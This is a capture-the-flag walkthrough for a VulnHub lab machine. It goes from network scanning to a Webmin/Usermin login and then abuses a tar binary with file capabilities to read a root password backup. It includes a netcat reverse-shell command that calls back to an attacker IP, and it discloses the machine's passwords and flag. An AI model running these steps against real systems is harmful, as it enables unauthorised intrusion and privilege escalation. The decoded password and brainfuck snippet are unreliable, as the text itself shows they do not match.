Machine Link : https://www.vulnhub.com/entry/empire-breakout,751/
step1 : arp-scan -l -- discovers the target's IP on the local network (here 192.168.0.188)
step2 : nmap -T4 -sSV -p- 192.168.0.188 -Pn -A
FINDING
80/tcp open http Apache httpd 2.4.51 ((Debian))
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
20000/tcp open http MiniServ 1.830 (Webmin httpd)
step3 : enum4linux -a 192.168.0.188
FINDING
S-1-22-1-1000 Unix User\cyber (Local User) -- the local user name is cyber
step4 : open http://192.168.0.188/ in the browser and view the page source; the following is hidden in the HTML
FINDING
++++++++++[+++++++++++++++++++++-]++++++++++++++++. ++++.+++++++++++++++++.----.++++++++++.-----------.-----------.++++.+.-.--------. ++++++++++++++++++++.------------.---------.++++++.++++++.
This is brainfuck (an esoteric programming language, not a cipher): run it through an interpreter, e.g. https://www.dcode.fr/brainfuck-language, and its output is the password. Note that the copy above contains no < or > pointer-movement commands at all, which a working program needs; as printed it never halts, so take the program from the live page source rather than from here.
the password is ".2uqPEfj3DPa-3" -- check this against the decoder output: the program above has 16 output (.) commands but this string has 14 characters, so angle brackets were probably stripped from it as well.
step5 : open https://192.168.0.188:10000/ (MiniServ serves TLS by default, so use https if the plain http URL does not load) and log in with user cyber and the password from step 4. Webmin on 10000 normally uses its own account database; if it rejects cyber, use port 20000, which is Usermin on the same MiniServ and accepts ordinary Unix accounts.
step6 : at the bottom of the left-hand menu there is a Command Shell entry; open it to run commands as cyber
step7 : ls -la -- cyber's home contains a copy of the tar binary. getcap -r / 2>/dev/null -- lists every binary on the system with file capabilities and shows the capability granted to this tar copy: it lets the binary read files that cyber's own permissions would not allow, which is what the next steps abuse
step8 : ls -la /var/backups
FINDING
.old_pass.bak -- a backup of an old password that cyber cannot read directly; the leading dot means it only shows up with ls -a
step9 : ./tar -cf pass.tar /var/backups/.old_pass.bak -- the capability-bearing tar reads the file and stores it in the archive; tar strips the leading / from the member name
step10 : ./tar -xf pass.tar -- extracts the copy to ./var/backups/.old_pass.bak under the current directory, now owned by cyber and readable
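Added example (not from the walkthrough): what steps 9, 10 and 13 actually do on disk, reproduced in a scratch directory with the ordinary system tar. The backup file, its content and all paths are constructed here, nothing touches /var/backups and no capability is involved, so it runs as any user; the only thing the capability adds on the target is the permission to read the source file.

```shell
#!/usr/bin/env bash
# tar_backup_copy: archive a file by absolute path, show that the stored member
# name has its leading '/' stripped, that the archive is uncompressed (so grep -a
# on pass.tar already reveals the content), and that -xf recreates the relative
# path under the current directory. Prints the recovered content on success.
tar_backup_copy() {
    local work secret member extracted
    work=$(mktemp -d) || return 2
    mkdir -p "$work/var/backups" "$work/home" || return 2
    secret='not-the-real-password'                  # constructed stand-in value
    printf '%s\n' "$secret" > "$work/var/backups/.old_pass.bak"

    # Step 9 equivalent: tar -cf with an absolute path. tar strips the leading
    # '/' ("Removing leading `/' from member names"), so the member is relative.
    member=${work#/}/var/backups/.old_pass.bak
    ( cd "$work/home" && tar -cf pass.tar "$work/var/backups/.old_pass.bak" 2>/dev/null ) || return 1
    [ "$(tar -tf "$work/home/pass.tar")" = "$member" ] || return 1

    # Step 13 shortcut: a plain tar archive is not compressed, which is why
    # "cat pass.tar" in the walkthrough shows the password too.
    grep -aq -- "$secret" "$work/home/pass.tar" || return 1

    # Step 10 equivalent: -xf recreates the member path under the current
    # directory. On the target that is ./var/backups/.old_pass.bak in cyber's
    # home; here the scratch prefix is part of the path as well.
    ( cd "$work/home" && tar -xf pass.tar ) || return 1
    extracted="$work/home/$member"
    [ -f "$extracted" ] || return 1

    cat "$extracted"
    rm -rf "$work"
}

tar_backup_copy
```

The tar -tf check is the one to run on the box before extracting: it tells you exactly where -xf will drop the copy, so you do not go looking for it at the original absolute path.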
step11 : on the attacker machine start a listener: nc -nvlp 4444
step12 : in the Usermin command shell run nc 192.168.0.106 4444 -e /bin/bash (192.168.0.106 is the attacker's IP) and hit enter; the web shell is not interactive enough for su, so the rest is done in this reverse shell. -e only exists in netcat builds that support it; if it is missing, a bash /dev/tcp reverse shell does the same job.
step13 : in the reverse shell, cat var/backups/.old_pass.bak (cat pass.tar also shows it, since tar archives are not compressed) -- the root password is Ts&4&YurgtRX(=~h
step14 : su root and enter that password. su needs a terminal; if it fails in the raw reverse shell, spawn a pty first (python3's pty module does this).
step15 : whoami now prints root; cd /root and ls shows rOOt.txt; read it with less rOOt.txt (use less if cat does not display it)
FINDING
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}
Author: Icex64 & Empire Cybersecurity